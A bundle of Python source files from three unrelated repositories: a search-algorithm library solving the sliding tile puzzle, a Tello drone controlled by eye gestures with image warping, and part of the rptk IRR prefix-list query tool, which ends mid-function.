<filename>cannibals/problems/sliding_tile/puzzle.py
"""This module defines the sliding tile puzzle problem.
Author: <NAME>
"""
from copy import copy
from cannibals.problems.base import AbstractProblem
from cannibals.problems.sliding_tile.board import Board
class SlidingTilePuzzle(AbstractProblem):
"""Implementation of the sliding tile puzzle.
The sliding tile puzzle, or n-puzzle, consists of an n by n board with n^2 - 1 numbered tiles and a blank space.
A tile adjacent to the blank space can slide into the space. The object is to reach a specified goal state.
In this implementation, we think of an action as moving the blank tile either up, down, left, or right.
The 8-puzzle has 9!/2=181, 440 reachable states and is easily solved. The 15-puzzle (on a 4×4 board) has around
1.3 trillion states, and random instances can be solved optimally in a few milliseconds by the best search
algorithms. The 24-puzzle (on a 5 × 5 board) has around 1025 states, and random instances take several hours to
solve optimally.
"""
VALID_ACTIONS = ['U', 'D', 'L', 'R']
def __init__(self, initial_state, goal_state='123456780'):
if isinstance(initial_state, str):
initial_state = Board(initial_state)
assert isinstance(initial_state, Board)
if isinstance(goal_state, str):
goal_state = Board(goal_state)
assert isinstance(goal_state, Board)
super().__init__(initial_state)
self.goal_state = goal_state
def get_actions(self, state):
actions = copy(self.VALID_ACTIONS)
if state.blank_pos[0] == 0:
actions.remove('U')
if state.blank_pos[0] == state.board_size - 1:
actions.remove('D')
if state.blank_pos[1] == 0:
actions.remove('L')
if state.blank_pos[1] == state.board_size - 1:
actions.remove('R')
return actions
def goal_test(self, state):
return state.tile_list == self.goal_state.tile_list
def transition(self, state, action):
return state.move(action), 1.0
|
rystrauss/cannibals
|
cannibals/search/frontiers.py
|
<reponame>rystrauss/cannibals
"""Contains implementations of various data structures which are to be used as frontiers.
Author: <NAME>
"""
import heapq
from abc import ABC, abstractmethod
from collections import deque
class Frontier(ABC):
"""The abstract base class representing a frontier.
A frontier is the collection of nodes that are currently under consideration for being visited next by the
search algorithm.
"""
def __init__(self, data):
self._data = data
self._hash_table = set(data)
def __contains__(self, item):
return self._hash_table.__contains__(item)
def __len__(self):
return len(self._data)
def __str__(self):
return str(self._data)
@abstractmethod
def push(self, element):
"""Adds an element to the frontier.
Args:
element: The element being added.
Returns:
None.
"""
pass
@abstractmethod
def pop(self):
"""Retrieves the next node to visit from the frontier.
Returns:
The next node to be visited.
"""
pass
def empty(self):
"""Determines whether or not the frontier is empty.
Returns:
True iff the frontier is empty and False otherwise.
"""
return len(self._data) == 0
class FIFOFrontier(Frontier):
"""A frontier that follows First-In-First-Out ordering.
Using a FIFO frontier results in the breadth-first search algorithm.
"""
def __init__(self, data):
super().__init__(deque(data))
def push(self, element):
self._data.append(element)
self._hash_table.add(element)
def pop(self):
removed = self._data.popleft()
self._hash_table.remove(removed)
return removed
class LIFOFrontier(Frontier):
"""A frontier that follows Last-In-First-Out ordering.
Using a LIFO frontier results in the depth-first search algorithm.
"""
def __init__(self, data):
super().__init__(deque(data))
def push(self, element):
self._data.append(element)
self._hash_table.add(element)
def pop(self):
removed = self._data.pop()
self._hash_table.remove(removed)
return removed
class PriorityFrontier(Frontier):
"""A frontier that used a priority queue to determine ordering.
This type of frontier is used by uniform cost search as well as A* search.
"""
def __init__(self, data):
super().__init__(data)
heapq.heapify(self._data)
def push(self, element):
heapq.heappush(self._data, element)
self._hash_table.add(element)
def pop(self):
removed = heapq.heappop(self._data)
self._hash_table.remove(removed)
return removed
def maybe_update(self, element):
"""Possibly updates the priority of a given node in the queue.
It is possible for two nodes to contain the same state but have different estimated solution costs (which
correspond to the priority in the queue). This method accepts a node whose state is also represented by
a node that is already in the frontier. The method will then check to see if the new node has a higher
priority (i.e. lower estimated solution cost). If so, it will replace the preexisting node in the frontier with
the better one. If not, the frontier will remain unchanged.
Args:
element: The node that might get updated. It is assumed that a node containing this node's state is
already in the frontier.
Returns:
None.
"""
# Get index for outdated version of element in the queue
index = self._data.index(element)
# The the version already in the queue has a lower priority, we can stop
if self._data[index] < element:
return
# Remove the outdated version from the hash table
self._hash_table.remove(self._data[index])
# Update element in the queue
self._data[index] = element
# Add it back to the hash table
self._hash_table.add(element)
# Restore the heap property
heapq.heapify(self._data)
|
rystrauss/cannibals
|
cannibals/search/base.py
|
"""This module contains the base components of search methods.
Author: <NAME>
"""
from abc import ABC, abstractmethod
class Node:
"""A node represents a single state in a search problem and is used by the graph-based search methods."""
def __init__(self, state, path_cost, estimated_cost=0.0, solution=None):
"""Constructs a new node.
Args:
state: The state associated with this node.
path_cost: The cost of the path leading to this node.
estimated_cost: The estimated cost from this node to the solution. This is only relevant to informed
search methods. Default to 0.0, for when doing uninformed search.
solution: A list of actions that represent the solution for reaching this node. Defaults to None.
"""
self.state = state
self.path_cost = path_cost
self.estimated_cost = estimated_cost
self.estimated_solution_cost = self.path_cost + self.estimated_cost
self.solution = solution or []
def __eq__(self, other):
return self.state.__eq__(other.state)
def __lt__(self, other):
return self.estimated_solution_cost < other.estimated_solution_cost
def __hash__(self):
return self.state.__hash__()
def expand(self, problem, heuristic_fn=None):
"""Expands this node by returning a list of its successors.
Each successor node contains a state that can be reached by taking an action in the current node's state.
Args:
problem: The `AbstractProblem` that is under consideration.
heuristic_fn: The optional heuristic function being used.
Returns:
A list of this node's successors.
"""
successors = []
for action in problem.get_actions(self.state):
next_state, step_cost = problem.transition(self.state, action)
estimated_cost = 0.0 if heuristic_fn is None else heuristic_fn(next_state)
successors.append(Node(next_state, self.path_cost + step_cost, estimated_cost, self.solution + [action]))
return successors
class SearchStrategy(ABC):
"""The abstract base class that all search strategies inherit from."""
@staticmethod
@abstractmethod
def search(problem):
"""Attempts to solve the given problem by performing a search over the state space.
Args:
problem: The `AbstractProblem` instance that is to be solved.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
pass
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/__init__.py
|
from .board import Board
from .puzzle import SlidingTilePuzzle
|
rystrauss/cannibals
|
cannibals/search/uninformed_search.py
|
"""Implementations of uninformed search strategies.
Author: <NAME>
"""
from cannibals.problems.base import AbstractProblem
from cannibals.search.base import Node, SearchStrategy
from cannibals.search.frontiers import FIFOFrontier, LIFOFrontier, Frontier
from cannibals.search.informed_search import AStarSearch
def _graph_search(frontier_type, problem):
"""Performs a graph search.
Args:
frontier_type: The type of frontier to use. Should be a subclass of `Frontier`.
problem: The `AbstractProblem` instance that is to be solved.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
assert isinstance(problem, AbstractProblem)
assert issubclass(frontier_type, Frontier)
node = Node(problem.initial_state, 0)
generated_nodes = 1
if problem.goal_test(node.state):
return node.solution
frontier = frontier_type([node])
explored = set()
solution = None
while not frontier.empty():
node = frontier.pop()
explored.add(node)
children = node.expand(problem)
generated_nodes += len(children)
for child in children:
if not (child in explored or child in frontier):
if problem.goal_test(child.state):
solution = child.solution
break
frontier.push(child)
else:
continue
break
return solution, generated_nodes
class BreadthFirstSearch(SearchStrategy):
"""Implementation of breadth-first search."""
@staticmethod
def search(problem):
return _graph_search(FIFOFrontier, problem)
class DepthFirstSearch(SearchStrategy):
"""Implementation of depth-first search."""
@staticmethod
def search(problem):
return _graph_search(LIFOFrontier, problem)
class UniformCostSearch(SearchStrategy):
"""Implementation of uniform-cost search."""
@staticmethod
def search(problem):
return AStarSearch.search(problem)
|
rystrauss/cannibals
|
examples/8puzzle.py
|
"""This script provides an example of how to use `cannibals` on the 8-puzzle.
Author: <NAME>
"""
from cannibals.problems.sliding_tile.heuristics import misplaced_tiles, make_heuristic_fn
from cannibals.problems.sliding_tile.puzzle import SlidingTilePuzzle
from cannibals.search.informed_search import AStarSearch
from cannibals.search.uninformed_search import BreadthFirstSearch, UniformCostSearch
def main():
# Define the problem we want to solve
# This instance of the 8-puzzle is solvable in 10 moves
problem = SlidingTilePuzzle('635841027', '865317024')
# Solve the problem using three different algorithms
_, bfs_nodes = BreadthFirstSearch.search(problem)
_, uc_nodes = UniformCostSearch.search(problem)
# For A*, we specify that the misplaced tiles heuristic should be used
solution, astar_nodes = AStarSearch.search(problem, heuristic_fn=make_heuristic_fn(problem, misplaced_tiles))
print(f'Solution: {solution}')
print(f'\nNodes generated by BFS:\t{bfs_nodes}')
print(f'Nodes generated by UC:\t{uc_nodes}')
print(f'Nodes generated by A*:\t{astar_nodes}')
if __name__ == '__main__':
main()
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/board.py
|
<reponame>rystrauss/cannibals
"""Contains a class representing the board for the sliding tile puzzle.
Author: <NAME>
"""
import math
import re
from copy import copy
class Board:
"""A board of a sliding tile puzzle.
This class constitutes a state of the sliding tile puzzle search problem."""
def __init__(self, tile_list):
self.board_size = int(math.sqrt(len(tile_list)))
self.tile_list = list(tile_list)
self.blank_pos = self._convert_index(tile_list.index('0'))
def __eq__(self, other):
return isinstance(other, Board) and self.tile_list == other.tile_list
def __hash__(self):
return tuple(self.tile_list).__hash__()
def __str__(self):
s = ''.join(self.tile_list).replace('0', '_')
lines = re.findall('.' * self.board_size, s)
return '\n'.join(lines)
def _convert_index(self, index):
if isinstance(index, int):
row = index // self.board_size
col = index % self.board_size
return row, col
else:
row, col = index
return row * self.board_size + col
def move(self, action):
"""Returns the board that results from taking a given action in this board.
Args:
action: The action to be taken. Either 'U', 'D', 'L', or 'R'.
Returns:
A board that reflects the transition from the given action.
"""
if action == 'U':
swap_pos = self.blank_pos[0] - 1, self.blank_pos[1]
elif action == 'D':
swap_pos = self.blank_pos[0] + 1, self.blank_pos[1]
elif action == 'L':
swap_pos = self.blank_pos[0], self.blank_pos[1] - 1
elif action == 'R':
swap_pos = self.blank_pos[0], self.blank_pos[1] + 1
else:
raise ValueError(f'{action} is not a valid action')
new_tile_list = copy(self.tile_list)
temp = new_tile_list[self._convert_index(swap_pos)]
new_tile_list[self._convert_index(swap_pos)] = '0'
new_tile_list[self._convert_index(self.blank_pos)] = temp
return Board(new_tile_list)
|
catsaveearth/DRONE_EYE-Image-Warpping
|
final_Dron_Eyes.py
|
from tkinter import *
from PIL import ImageTk, Image
import cv2
import dlib
import numpy as np
import math
from math import dist
from utils import *
import keyboard, time
from threading import Thread
from skimage import exposure
w, h = 640, 480
#global variable
font = cv2.FONT_ITALIC
frame = None
horizon = False
retrial_brow = True
brow_basis = 0
threshold_value = 30
eye_detect = False
i = 0
time_value = 0
case_cnt = list([0, 0, 0, 0, 0, 0]) #None, left, right, rot_ccw, rot_cw, close
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +'haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +'haarcascade_lefteye_2splits.xml')
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')
# 눈 상태들
leftState = None #None, left, right, close
rightState = None
blinkCnt = 0
blinkTimer = 0
pre_rightState = None
pre_leftState = None
#드론 상태
flying = False
showStream = 0
tello = None
tello_frame_read = None
# 상태 변화 check -> 드론 움직임
def selectMotion():
global leftState, rightState, case_cnt, blinkCnt, flying, tello
if leftState == "None" and rightState == "None": #None 상태가 오랫동안 지속되면 초기화
case_cnt[0] += 1
if case_cnt[0] == 2:
case_cnt = list([0, 0, 0, 0, 0, 0]) #None, left, right, rot_ccw, rot_cw, close
Current_motion.config(text="No motion")
elif leftState == "left" and rightState == "left":
case_cnt[1] += 1
if case_cnt[1] >= 2:
if flying == True:
tello.move_left(20)
print("move_left")
Current_motion.config(text="move_left")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "right" and rightState == "right":
case_cnt[2] += 1
if case_cnt[2] >= 2:
if flying == True:
tello.move_right(20)
print("move_right")
Current_motion.config(text="move_right")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "close" and rightState != "close":
case_cnt[3] += 1
if case_cnt[3] >= 2:
if flying == True:
tello.rotate_counter_clockwise(30)
print("rotate CCW")
Current_motion.config(text="rotate CCW")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState != "close" and rightState == "close":
case_cnt[4] += 1
if case_cnt[4] >= 2:
if flying == True:
tello.rotate_clockwise(20)
print("rotate CW")
Current_motion.config(text="rotate CW")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "close" and rightState == "close":
case_cnt[5] += 1
if case_cnt[5] >= 3:
if flying == False:
tello.takeoff()
flying = True
print("takeoff")
Current_motion.config(text="takeoff")
else:
tello.land()
flying = False
print("land")
Current_motion.config(text="land")
case_cnt = list([0, 0, 0, 0, 0, 0])
def checkChangEyes():
global leftState, rightState, blinkCnt, pre_rightState, pre_leftState, blinkTimer, tello
if time_value - blinkTimer > 3:
if blinkCnt == 2:
blinkCnt = 0
if flying == True:
tello.move_forward(30)
print("move_front")
Current_motion.config(text="move_front")
elif blinkCnt == 3:
blinkCnt = 0
if flying == True:
tello.move_back(30)
print("move_back")
Current_motion.config(text="move_back")
else:
blinkCnt = 0
if pre_leftState == "close" and leftState != "close":
if pre_rightState == "close" and rightState != "close":
if blinkCnt == 0:
blinkTimer = time_value
blinkCnt += 1
pre_leftState = leftState
pre_rightState = rightState
# face detection
def face_landmark(gray, frame):
global eye_detect, horizon, brow_basis, leftState, rightState
if eye_detect == False:
return
# dlib (face_landmark)
rects = detector(gray, 1) # rects contains all the faces detected
for (i, rect) in enumerate(rects):
shape = predictor(gray, rect)
shape = shape_to_np(shape)
(lStart, lEnd) = (42, 48) #눈좌표
(rStart, rEnd) = (36, 42)
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftbrow = shape[24]
rightbrow = shape[19]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
(lx, ly) = leftbrow
cv2.circle(frame, (lx, ly), 1, (0, 255, 0), 3)
(rx, ry) = rightbrow
cv2.circle(frame, (rx, ry), 1, (0, 0, 255), 3)
if horizon == False or retrial_brow == True:
retrial_brow == False
brow_basis = ly-ry
eyebrowError['state'] = NORMAL
if horizon == True:
if leftEAR < 0.18 or rightEAR < 0.18:
if abs(ly - ry + brow_basis) > 6:
if ly - ry > 0:
leftState = "close"
rightState = "None"
else:
rightState = "close"
leftState = "None"
else:
leftState = "close"
rightState = "close"
else:
rightState = "None"
leftState = "None"
def faceDetect_cascade(gray, frame):
global eye_detect, horizon, leftState, rightState
# 얼굴 탐지
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y, w,h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255,0,0), 2) #사각형 범위
if w < 250:
cv2.putText(frame, "closer please", (x-5, y-5), font, 0.5, (255,255,0),2)
eye_detect = False
continue
else:
cv2.putText(frame, "Good", (x-5, y-5), font, 0.5, (255,255,0),2)
eye_detect = True
if eye_detect: #눈찾기
roi_gray = gray[y:int(y+h/2), x:x+w]
roi_color = frame[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
width_centor = x+w/2
current = None #True - right / False - left
eyes_num = 0
for (ex, ey, ew, eh) in eyes:
if eyes_num > 1:
continue
eyes_num = eyes_num + 1
pupil_frame = roi_gray[ey: ey+eh, ex: ex+ew]
cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey +eh), (255, 0, 0), 2)
if width_centor > x + ex + ew/2: #show right eyes
right_gray_roi, contours = pupil_detect(pupil_frame, threshold_value)
current = True
else: #how left eyes
left_gray_roi, contours = pupil_detect(pupil_frame, threshold_value)
current = False
if len(contours) != 0:
(cx, cy, cw, ch) = cv2.boundingRect(contours[0]) #제일 큰 conture를 출력하자
centerX = int((cx*2 + cw)/2)
centerY = int((cy*2 + ch)/2)
cv2.circle(roi_color, (ex + centerX, ey + centerY), 1, (0, 0, 255), 3)
cv2.rectangle(roi_color, (ex + cx, ey + cy), (ex + cx+cw, ey + cy+ch), (255, 0, 0), 2)
else:
if current == True:
rightState = "close"
else:
leftState = "close"
if current == True:
if rightState == "close":
continue
if abs(ew/2 - centerX) > 5:
if ew/2 - centerX > 0: #right
rightState = "right"
else:
rightState = "left"
else:
rightState = "None"
else:
if leftState == "close":
continue
if abs(ew/2 - centerX) > 5:
if ew/2 - centerX > 0: #right
leftState = "right"
else:
leftState = "left"
else:
leftState = "None"
def pupil_detect(gray_roi, threshold_value):
rows, cols = gray_roi.shape
gray_roi = cv2.GaussianBlur(gray_roi, (7,7), 0) #잡음제거
#눈동자 검출
_, threshold = cv2.threshold(gray_roi, threshold_value, 255, cv2.THRESH_BINARY_INV)
#눈동자 좌표 가져와서 표시
contours, none = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#눈동자만 표시
contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
return threshold, contours
def eye_aspect_ratio(eye):
A = dist(eye[1], eye[5])
B = dist(eye[2], eye[4])
C = dist(eye[0], eye[3])
ear = (A + B) / (2.0 * C)
return ear
def shape_to_np(shape, dtype="int"):
coords = np.zeros((68, 2), dtype=dtype)
for i in range(0, 68):
coords[i] = (shape.part(i).x, shape.part(i).y)
return coords
#Button event handling
def pupil_thresholdUP():
global threshold_value
threshold_value = threshold_value + 5
th_label.config(text=str(threshold_value))
def pupil_thresholdDown():
global threshold_value
threshold_value = threshold_value - 5
th_label.config(text=str(threshold_value))
def setBrow():
global horizon, brow_basis
horizon = True
retrial_brow = True
brow_label.config(text=str(brow_basis))
settingEnd['state'] = NORMAL
# Drone Stream
def startDrone():
global showStream
print("startDrone")
if showStream == 0:
showStream = Thread(target = droneSteram)
print(showStream)
showStream.start()
def droneSteram():
global tello, tello_frame_read
print("droneStream")
tello = Tello()
tello.connect()
tello.streamon()
tello_frame_read = tello.get_frame_read()
time.sleep(5)
print("get ready")
while True:
telloImg = tello_frame_read.frame
telloImg2 = cv2.resize(telloImg, (w, h))
cv2.imshow("Drone View", telloImg2)
cv2.waitKey(1)
def checkDroneState():
global flying, tello_frame_read
if tello_frame_read != None:
take_picture['state'] = NORMAL
if flying == True:
up_btn['state'] = NORMAL
down_btn['state'] = NORMAL
else:
up_btn['state'] = DISABLED
down_btn['state'] = DISABLED
def droneUp():
global flying, tello
if flying == True:
tello.move_up(20)
print("move_up")
Current_motion.config(text="move_up")
def droneDown():
global flying, tello
if flying == True:
tello.move_down(20)
print("move_down")
Current_motion.config(text="move_down")
def nothing():
pass
#function to order points to proper rectangle
def order_points(pts):
# initialzie a list of coordinates that will be ordered
# such that the first entry in the list is the top-left,
# the second entry is the top-right, the third is the
# bottom-right, and the fourth is the bottom-left
rect = np.zeros((4, 2), dtype="float32")
# the top-left point will have the smallest sum, whereas
# the bottom-right point will have the largest sum
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
# now, compute the difference between the points, the
# top-right point will have the smallest difference,
# whereas the bottom-left will have the largest difference
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
# return the ordered coordinates
return rect
#function to transform image to four points
def four_point_transform(image, pts):
# obtain a consistent order of the points and unpack them
# individually
rect = order_points(pts)
# # multiply the rectangle by the original ratio
# rect *= ratio
(tl, tr, br, bl) = rect
# compute the width of the new image, which will be the
# maximum distance between bottom-right and bottom-left
# x-coordiates or the top-right and top-left x-coordinates
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
# compute the height of the new image, which will be the
# maximum distance between the top-right and bottom-right
# y-coordinates or the top-left and bottom-left y-coordinates
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
# now that we have the dimensions of the new image, construct
# the set of destination points to obtain a "birds eye view",
# (i.e. top-down view) of the image, again specifying points
# in the top-left, top-right, bottom-right, and bottom-left
# order
dst = np.array([
[0, 0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype="float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
# return the warped image
return warped
#function to find two largest countours which ones are may be
# full image and our rectangle edged object
def findLargestCountours(cntList, cntWidths):
newCntList = []
newCntWidths = []
#finding 1st largest rectangle
first_largest_cnt_pos = cntWidths.index(max(cntWidths))
# adding it in new
newCntList.append(cntList[first_largest_cnt_pos])
newCntWidths.append(cntWidths[first_largest_cnt_pos])
#removing it from old
cntList.pop(first_largest_cnt_pos)
cntWidths.pop(first_largest_cnt_pos)
#finding second largest rectangle
seccond_largest_cnt_pos = cntWidths.index(max(cntWidths))
# adding it in new
newCntList.append(cntList[seccond_largest_cnt_pos])
newCntWidths.append(cntWidths[seccond_largest_cnt_pos])
#removing it from old
cntList.pop(seccond_largest_cnt_pos)
cntWidths.pop(seccond_largest_cnt_pos)
print('Old Screen Dimentions filtered', cntWidths)
print('Screen Dimentions filtered', newCntWidths)
return newCntList, newCntWidths
def takePicture():
global tello_frame_read
img = tello_frame_read.frame
print("take a picture")
current_time = time.strftime('%H%M%S')
cv2.imshow(current_time + ".png", img)
pic_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
pic_gray = cv2.GaussianBlur(pic_gray, (5, 5), 0)
cv2.namedWindow("Canny Edge")
cv2.createTrackbar('low threshold', 'Canny Edge', 0, 1000, nothing)
cv2.createTrackbar('high threshold', 'Canny Edge', 0, 1000, nothing)
cv2.setTrackbarPos('low threshold', 'Canny Edge', 50)
cv2.setTrackbarPos('high threshold', 'Canny Edge', 150)
while True:
low = cv2.getTrackbarPos('low threshold', 'Canny Edge')
high = cv2.getTrackbarPos('high threshold', 'Canny Edge')
img_canny = cv2.Canny(pic_gray, low, high)
cv2.imshow("Canny Edge", img_canny)
keypress = cv2.waitKey(1)
if keypress & 0xFF == ord('q'):
break
#get contours
cnts, hierarcy = cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)
screenCntList = []
scrWidths = []
for cnt in cnts:
peri = cv2.arcLength(cnt, True) # cnts[1] always rectangle O.o
approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)
screenCnt = approx
# print(len(approx))
if (len(screenCnt) == 4):
(X, Y, W, H) = cv2.boundingRect(cnt)
# print('X Y W H', (X, Y, W, H))
screenCntList.append(screenCnt)
scrWidths.append(W)
screenCntList, scrWidths = findLargestCountours(screenCntList, scrWidths)
pts = screenCntList[0].reshape(4, 2)
warped = four_point_transform(img, pts)
cv2.imshow("warp", warped)
cv2.waitKey(0)
window = Tk()
window.title("Drone Eyes")
window.geometry("720x650")
window.resizable(False, False)
title = Label(window, text="Setting")
title.pack()
app = Frame(window, bg="white")
app.pack()
lmain = Label(app)
lmain.pack()
th_label = Label(window, text="30")
pupilPlusBtn = Button(window, text = 'pupil ++', command = pupil_thresholdUP)
pupilMinusBtn = Button(window, text = 'pupil --', command = pupil_thresholdDown)
th_label.place(x=110, y=520)
pupilPlusBtn.place(x=50, y=520)
pupilMinusBtn.place(x=135, y=520)
brow_label = Label(window, text="0")
eyebrowError = Button(window, text = 'brow zero adjustment', command = setBrow, state=DISABLED)
settingEnd = Button(window, text = 'START', state=DISABLED, command = startDrone)
brow_label.place(x=400, y=520)
eyebrowError.place(x=420, y=520)
settingEnd.place(x=630, y=520)
Current_motion = Label(window, text="No Motion")
Current_motion.place(x=300, y=550)
up_btn = Button(window, text = 'UP', state=DISABLED, command =droneUp)
down_btn = Button(window, text = 'DOWN', state=DISABLED, command =droneDown)
up_btn.place(x=400, y=600)
down_btn.place(x=430, y=600)
take_picture = Button(window, text = 'Take a Picture', state=DISABLED, command =takePicture)
take_picture.place(x=600, y=600)
# Capture from camera
cap = cv2.VideoCapture(0)
# function for video streaming
def video_stream():
global i, time_value
checkDroneState()
if time_value == int(i):
time_value = int(i) + 1
if horizon == True and eye_detect == True:
selectMotion()
i += 0.5
checkChangEyes()
_, img = cap.read()
frame = img
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
face_landmark(gray, frame)
faceDetect_cascade(gray, frame)
cv2.putText(frame, str(leftState), (300,300), font, 0.5, (255,255,0), 2)
cv2.putText(frame, str(rightState), (350,300), font, 0.5, (255,255,0), 2)
img = Image.fromarray(frame)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, video_stream)
video_stream()
window.mainloop()
|
catsaveearth/DRONE_EYE-Image-Warpping
|
utils.py
|
<gh_stars>0
#201935023 김수현
from djitellopy import Tello
import cv2
import time
def initTello():
myDrone = Tello()
myDrone.connect()
myDrone.for_back_velocity = 0
myDrone.left_right_velocity = 0
myDrone.up_down_velocity = 0
myDrone.yaw_velocity = 0
myDrone.speed = 0
print("\n * Drone battery percentage : " + str(myDrone.get_battery()) + "%")
myDrone.streamoff()
return myDrone
def moveTello(myDrone):
myDrone.takeoff()
time.sleep(5)
myDrone.move_back(50)
time.sleep(5)
myDrone.rotate_clockwise(360)
time.sleep(5)
myDrone.move_forward(50)
time.sleep(5)
myDrone.flip_right()
time.sleep(5)
myDrone.flip_left()
time.sleep(5)
myDrone.land()
time.sleep(5)
def telloGetFrame(myDrone, w = 360, h = 240):
myFrame = myDrone.get_frame_read()
myFrame = myFrame.frame #numpy.ndarray
img = cv2.resize(myFrame, (w, h)) #numpy.ndarray
return img
#201935023 김수현
|
wolcomm/rptk
|
test/test_queries.py
|
<reponame>wolcomm/rptk<filename>test/test_queries.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk query class test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
from helpers import available_policies, default_query_classes, objects
import pytest
class TestQueryClass(object):
"""Test cases for rptk query classes."""
@pytest.mark.parametrize("path", default_query_classes().values())
@pytest.mark.parametrize("policy", available_policies().keys())
@pytest.mark.parametrize("objects", objects())
def test_query_class(self, posix, path, policy, objects, validate_schema):
"""Test rptk query class."""
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
cls = getattr(mod, cls_name)
with cls(host="whois.radb.net", port=43, policy=policy) as q:
if q.posix_only and not posix:
pytest.skip("skipping posix only test")
result = q.query(*objects)
assert validate_schema(result, "get_prefix_list.schema")
|
wolcomm/rptk
|
rptk/query/native.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.native module."""
from __future__ import print_function
from __future__ import unicode_literals
import ipaddress
import re
import socket
from rptk.__meta__ import __version__ as version
from rptk.query import BaseQuery
try:
unicode
except NameError:
unicode = str
class NativeQuery(BaseQuery):
"""Performs queries directly over python sockets."""
_regexp = re.compile(r'(?P<state>[ACDEF])(?P<len>\d*)(?P<msg>[\w\s]*)$')
_keepalive = True
def __enter__(self):
"""Set up a TCP connection."""
self.log_ready_start()
self._connect()
self.log_ready_done()
return self
def __exit__(self, typ, value, traceback):
"""Tear down the connection."""
self.log_exit_start()
self._disconnect()
self.log_exit_done()
def query(self, *objects):
"""Execute a query."""
objects = super(NativeQuery, self).query(*objects)
result = dict()
for obj in objects:
tmp = dict()
sets = {u'ipv4': set(), u'ipv6': set()}
self.log.debug(msg="trying to get members of {}".format(obj))
members = self._members(obj=obj)
for member in members:
self.log.debug(msg="trying to get routes for {}"
.format(member))
routes = self._routes(obj=member)
for af in routes:
sets[af].update(routes[af])
for af, s in sets.items():
prefixes = sorted(list(s))
tmp[af] = [{u'prefix': p.with_prefixlen, u'exact': True}
for p in prefixes]
self.log.debug(msg="found {} {} prefixes for object {}"
.format(len(s), af, obj))
result.update({obj: tmp})
self.log_method_exit(method=self.current_method)
return result
def _connect(self):
"""Establish a TCP connection to the IRR server."""
self.log.debug(msg="creating socket")
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.log.debug(msg="trying to connect to {}".format(self.target))
try:
self._socket.connect((self.host, self.port))
except socket.error as e:
self.log.error(msg="{}".format(e))
raise e
self.log.debug(msg="socket connected")
if self._keepalive:
self._socket.send(b'!!\n')
self._query('!nRPTK-{}'.format(version))
def _disconnect(self):
"""Tear the TCP connection down."""
self.log.debug(msg="disconnecting socket")
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self.log.debug(msg="socket closed")
def _query(self, q, skip_errors=None):
q += '\n'
q = q.encode()
total_sent = 0
query_length = len(q)
while total_sent < query_length:
sent = self._socket.send(q[total_sent:])
if not sent:
self.raise_runtime_error(msg="socket connection broken")
total_sent += sent
self.log.debug(msg="sent query {} (length {} bytes)"
.format(q.rstrip(), total_sent))
chunks = []
chunk_size = 4096
chunk = self._socket.recv(chunk_size)
response, chunk = chunk.split(b'\n', 1)
try:
response_length = self._parse_response(response)
except IRRQueryError as e:
